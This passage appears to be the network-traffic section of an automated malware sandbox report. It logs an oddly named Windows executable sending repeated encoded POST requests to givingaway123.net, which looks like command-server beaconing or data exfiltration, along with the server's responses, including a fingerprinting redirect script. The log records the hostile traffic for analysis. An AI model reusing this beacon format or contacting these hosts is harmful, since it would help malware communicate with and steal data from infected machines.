                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:26:32.176753044 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:32 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 7468
                                                                                                                          Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
                                                                                                                          Connection: close
                                                                                                                          ETag: "606f145e-1d2c"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><
                                                                                                                          Oct 21, 2024 17:26:32.176819086 CEST1236INData Raw: 68 31 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 20 64 75 65 20 74 6f 20 6e 6f 6e 2d 63 6f 6d 70 6c 65 74 69 6f 6e 20 6f 66 20 61 6e 20 49 43 41 4e 4e 2d 6d 61 6e 64 61 74 65 64 20 63 6f 6e 74 61
                                                                                                                          Data Ascii: h1>This domain has been suspended due to non-completion of an ICANN-mandated contact verification.</h1><p>As part of the ongoing effort to improve contact quality, the Internet Corporation for Assigned Names and Numbers (ICANN) requires
                                                                                                                          Oct 21, 2024 17:26:32.176856995 CEST424INData Raw: 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 61 6e 74 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 6f 72 20 63 68 61 6e 67 65 64 20 62 75 74 20 6e 6f 74 20 76 65 72 69 66 69 65 64 20 79 65 74 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09
                                                                                                                          Data Ascii: omain registrant has been modified or changed but not verified yet.</span><br>Changing the email address of the domain registrant requires a verification.</li><li><i class="fa fa-play"></i><span class="bold">The domain has recent
                                                                                                                          Oct 21, 2024 17:26:32.177584887 CEST1236INData Raw: 6d 61 69 6e 20 72 65 67 69 73 74 72 61 6e 74 e2 80 99 73 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 65 73 2c 20 65 76 65 6e 20 61 66 74 65 72 20 69 6e 63 6f 6d 69 6e 67 20 74 72 61 6e 73 66 65 72 73 2e 3c 2f 6c 69 3e 0d 0a 09 09 09 09 09 3c 6c 69
                                                                                                                          Data Ascii: main registrants email addresses, even after incoming transfers.</li><li><i class="fa fa-play"></i><span class="bold">Someone has complained about the accuracy of the data provided for publication in the WHOIS, triggering a re-verifi
                                                                                                                          Oct 21, 2024 17:26:32.177620888 CEST1236INData Raw: 20 6c 69 6e 6b 20 61 6e 64 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 77 69 6c 6c 20 62 65 20 75 6e 73 75 73 70 65 6e 64 65 64 20 77 69 74 68 69 6e 20 33 30 20 6d 69 6e 75 74 65 73 2e 0d 0a 09 09 09 50 6c 65 61 73 65 20 6d 61 6b 65 20 73 75 72 65 20
                                                                                                                          Data Ascii: link and your domain will be unsuspended within 30 minutes.Please make sure to check your spam folder if you cannot find that mail.</p><p><span class="bold">You can request to resend the verification email through your domain prov
                                                                                                                          Oct 21, 2024 17:26:32.178761005 CEST1236INData Raw: 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 20 63 6f 6c 2d 73 6d 2d 38 20 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 32 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6c 69 63 65 22 3e 0d 0a 09 09 09 3c 68 32 3e 46 72 65 71 75 65 6e 74 6c
                                                                                                                          Data Ascii: s="text-center col-sm-8 col-sm-offset-2"><div class="slice"><h2>Frequently Asked Questions</h2><div class="icon_left"><span class="fa fa-user-circle"></span></div><div class="slice_content"><p><span class=
                                                                                                                          Oct 21, 2024 17:26:32.178801060 CEST1108INData Raw: 61 6e 20 75 70 64 61 74 65 20 74 6f 20 79 6f 75 72 20 64 61 74 61 2e 3c 2f 70 3e 0d 0a 0d 0a 09 09 09 09 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 6f 6c 64 22 3e 48 6f 77 20 63 61 6e 20 49 20 72 65 61 63 74 69 76 61 74 65 20 6d 79 20 64
                                                                                                                          Data Ascii: an update to your data.</p><p><span class="bold">How can I reactivate my domain and remove the suspension?</span><br>This requires the completion of the verification process. You can resend the verification mail through your doma


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.657337103.224.182.242802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:38.162096977 CEST763OUTPOST /1juc/ HTTP/1.1
                                                                                                                          Host: www.givingaway123.net
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.givingaway123.net
                                                                                                                          Referer: http://www.givingaway123.net/1juc/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 63 55 71 4c 7a 59 68 41 2f 4b 6c 6a 57 6e 49 6e 7a 32 66 71 6a 74 62 47 41 6d 54 4f 2f 63 32 78 4f 75 72 32 63 76 30 74 63 78 77 4a 32 58 4e 56 41 66 6f 4f 36 53 63 2b 46 57 74 39 4f 6b 74 79 44 30 71 44 36 78 53 7a 38 4e 47 48 78 62 33 70 58 53 66 62 53 46 57 64 39 64 6c 4b 4d 45 75 44 41 6f 78 4e 66 70 64 45 77 57 6e 2b 6a 56 32 75 33 4d 4d 58 33 31 36 39 55 42 76 49 58 6a 43 72 63 39 6d 5a 31 66 52 35 46 52 51 68 4a 79 63 6d 73 37 49 32 47 53 67 4b 42 50 6e 66 4a 66 54 37 72 48 6a 33 32 77 2f 2f 54 65 6f 6d 30 77 74 45 46 4e 6e 4d 74 44 56 37 7a 71 77 59 73 46 43 2f
                                                                                                                          Data Ascii: qFHlI=ffTojLdnB/BTcUqLzYhA/KljWnInz2fqjtbGAmTO/c2xOur2cv0tcxwJ2XNVAfoO6Sc+FWt9OktyD0qD6xSz8NGHxb3pXSfbSFWd9dlKMEuDAoxNfpdEwWn+jV2u3MMX3169UBvIXjCrc9mZ1fR5FRQhJycms7I2GSgKBPnfJfT7rHj32w//Teom0wtEFNnMtDV7zqwYsFC/
                                                                                                                          Oct 21, 2024 17:26:38.702219009 CEST877INHTTP/1.1 200 OK
                                                                                                                          date: Mon, 21 Oct 2024 15:26:38 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1729524398.8660091; expires=Thu, 19-Oct-2034 15:26:38 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-encoding: gzip
                                                                                                                          content-length: 582
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close
                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                                                          Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.657338103.224.182.242802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:40.708942890 CEST787OUTPOST /1juc/ HTTP/1.1
                                                                                                                          Host: www.givingaway123.net
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.givingaway123.net
                                                                                                                          Referer: http://www.givingaway123.net/1juc/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 64 30 61 4c 78 2f 56 41 35 71 6c 69 61 48 49 6e 6c 47 66 75 6a 74 66 47 41 6e 48 65 2f 4f 69 78 4f 4f 62 32 64 74 63 74 66 78 77 4a 78 6e 4e 51 65 76 6f 52 36 53 52 44 46 58 52 39 4f 67 39 79 44 31 61 44 36 43 36 30 39 64 47 42 39 37 33 6e 59 79 66 62 53 46 57 64 39 63 42 6b 4d 45 32 44 41 59 68 4e 63 4d 70 48 2b 32 6e 35 7a 46 32 75 7a 4d 4d 62 33 31 36 62 55 41 44 75 58 68 4b 72 63 39 32 5a 79 4f 52 34 65 42 51 6e 57 69 64 4d 74 34 35 59 50 78 42 30 4b 4e 6d 34 49 75 54 46 71 78 69 74 71 44 2f 63 42 4f 49 6b 30 79 31 32 46 74 6e 6d 76 44 74 37 68 39 38 2f 6a 78 6e 63 30 75 72 55 77 77 34 4f 46 4f 78 75 55 77 2f 63 6d 62 45 74 63 41 3d 3d
                                                                                                                          Data Ascii: qFHlI=ffTojLdnB/BTd0aLx/VA5qliaHInlGfujtfGAnHe/OixOOb2dtctfxwJxnNQevoR6SRDFXR9Og9yD1aD6C609dGB973nYyfbSFWd9cBkME2DAYhNcMpH+2n5zF2uzMMb316bUADuXhKrc92ZyOR4eBQnWidMt45YPxB0KNm4IuTFqxitqD/cBOIk0y12FtnmvDt7h98/jxnc0urUww4OFOxuUw/cmbEtcA==
                                                                                                                          Oct 21, 2024 17:26:41.252935886 CEST877INHTTP/1.1 200 OK
                                                                                                                          date: Mon, 21 Oct 2024 15:26:41 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1729524401.7366602; expires=Thu, 19-Oct-2034 15:26:41 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-encoding: gzip
                                                                                                                          content-length: 582
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close
                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                                                          Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.657339103.224.182.242802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:43.255112886 CEST1800OUTPOST /1juc/ HTTP/1.1
                                                                                                                          Host: www.givingaway123.net
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.givingaway123.net
                                                                                                                          Referer: http://www.givingaway123.net/1juc/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 64 30 61 4c 78 2f 56 41 35 71 6c 69 61 48 49 6e 6c 47 66 75 6a 74 66 47 41 6e 48 65 2f 4f 36 78 4f 66 37 32 64 4c 55 74 65 78 77 4a 79 6e 4e 52 65 76 70 4e 36 52 68 48 46 58 64 58 4f 6d 68 79 43 54 47 44 34 7a 36 30 30 64 47 42 69 4c 33 6d 58 53 65 47 53 46 47 52 39 63 52 6b 4d 45 32 44 41 61 70 4e 4c 4a 64 48 38 32 6e 2b 6a 56 32 71 33 4d 4e 4d 33 31 53 6c 55 41 48 59 51 52 71 72 46 5a 71 5a 33 38 35 34 44 52 51 6c 56 69 64 55 74 34 31 62 50 78 63 4e 4b 4d 44 64 49 73 50 46 6f 33 7a 32 2f 69 44 63 66 75 6b 66 72 54 39 71 43 39 2f 56 6f 69 64 59 68 76 74 4d 6d 46 37 53 74 59 33 4a 36 41 45 4c 53 4d 35 44 53 33 36 72 6c 66 4a 6f 48 66 48 6b 6d 48 32 51 32 76 70 34 41 57 64 43 6a 78 6f 76 63 68 5a 42 35 50 52 6b 76 68 61 6f 6b 36 72 72 6e 54 51 47 64 37 39 48 4c 69 30 66 68 52 50 6b 67 6f 6e 79 63 6a 44 79 4d 55 4d 6b 5a 52 6a 6b 6c 73 41 4a 70 63 36 76 73 38 6c 4a 59 2f 6b 41 6f 41 6a 56 64 6f 2b 7a 41 42 6d 54 48 55 38 47 6c 58 48 41 59 66 77 49 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=ffTojLdnB/BTd0aLx/VA5qliaHInlGfujtfGAnHe/O6xOf72dLUtexwJynNRevpN6RhHFXdXOmhyCTGD4z600dGBiL3mXSeGSFGR9cRkME2DAapNLJdH82n+jV2q3MNM31SlUAHYQRqrFZqZ3854DRQlVidUt41bPxcNKMDdIsPFo3z2/iDcfukfrT9qC9/VoidYhvtMmF7StY3J6AELSM5DS36rlfJoHfHkmH2Q2vp4AWdCjxovchZB5PRkvhaok6rrnTQGd79HLi0fhRPkgonycjDyMUMkZRjklsAJpc6vs8lJY/kAoAjVdo+zABmTHU8GlXHAYfwIKxB/OCS5Jdut3Blp/NbQUx1goOnZ3QR3WWxNJqQGnM8/qNSYm0Qpfb9wQfFdLN5BcAzFDv42xvsQm3hXsxfrZ6s2U/AYhIhk+O6BO3k8xJ1d19xK4hPpmg9tCDfA0E3wGgUarqkEjZ6auGd9VgRjN5ULQLZ6XMfGly5aOY1TPUb9yJH3Kowaqh02rdhLAeIugy8ci+0oMwUd4C458AtEkyD4MiC/DXmL3WF+uKzCFd5rGooDb9tfPgb4Phx1rbPI4pWjwOcix9v/hOb1go1FGLtRigKEFx7MBnejPVdCJCDko/hOXPFZmNwpwr7l+L0yqhVfLrKhHjkKb8qy7MFK3l+Z0p3ExDUDFrGF8NjQ3e9z8zXP+cE9DaOFAOnWnA7wuROdldKQLtGWX+iayA/I+byQxid6aZTihD61AcxBmeO54Nh4aIORzRmK+h6giW0hzIi9OOHVDXGSdMlW3tGtN/MruDaHB4XScOsapuOKIGH1qUnh5DX4/JAjgHKQH2WW6+sfHwaWhYjpl31r8pUgXvxWXSR3NPi4ESeG/O+inB2J7zKRgz3o/I/LjW3RrBOR4Uc+4mD6zbLwy9FfAhTygmPoKbaaEwJRK0q95a+f+BnfXX88hWNsHMNs+qmB1nYIIJDgTywpKOurqBWXYsMLQsxD6SnSr2ZySN [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:26:43.792601109 CEST877INHTTP/1.1 200 OK
                                                                                                                          date: Mon, 21 Oct 2024 15:26:43 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1729524403.5845140; expires=Thu, 19-Oct-2034 15:26:43 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-encoding: gzip
                                                                                                                          content-length: 582
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close
                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f [TRUNCATED]
                                                                                                                          Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.657340103.224.182.242802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:45.797872066 CEST500OUTGET /1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D5s2z0t36TzSFHzX86cZDIkqxXLJMLfdGhV7qhxXK/cNpqGCzJ34= HTTP/1.1
                                                                                                                          Host: www.givingaway123.net
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:26:46.344805956 CEST1236INHTTP/1.1 200 OK
                                                                                                                          date: Mon, 21 Oct 2024 15:26:46 GMT
                                                                                                                          server: Apache
                                                                                                                          set-cookie: __tad=1729524406.1551893; expires=Thu, 19-Oct-2034 15:26:46 GMT; Max-Age=315360000
                                                                                                                          vary: Accept-Encoding
                                                                                                                          content-length: 1569
                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 67 69 76 69 6e 67 61 77 61 79 31 32 33 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 69 76 69 6e 67 61 77 61 79 31 32 33 2e 6e 65 74 2f 31 6a 75 63 2f 3f 44 4a 3d 75 4e 78 34 38 6a 64 50 79 76 6d 68 71 74 4d 30 26 71 46 48 6c 49 3d 53 64 37 49 67 38 73 55 66 38 35 47 55 44 4f 65 78 66 5a 49 37 64 34 66 57 42 52 31 70 32 2b 50 68 49 44 77 59 48 58 34 74 2f 48 44 66 74 44 4a 63 61 41 55 53 33 41 72 6b 48 51 54 64 65 55 50 78 6e 52 36 43 48 64 6b 5a 42 64 49 61 79 75 58 30 6b 2b 44 35 73 32 7a 30 74 33 36 54 7a 53 46 48 7a 58 38 36 63 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>givingaway123.net</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.givingaway123.net/1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D5s2z0t36TzSFHzX86cZDIkqxXLJMLfdGhV7qhxXK/cNpqGCzJ34=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style>
                                                                                                                          Oct 21, 2024 17:26:46.344855070 CEST605INData Raw: 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65
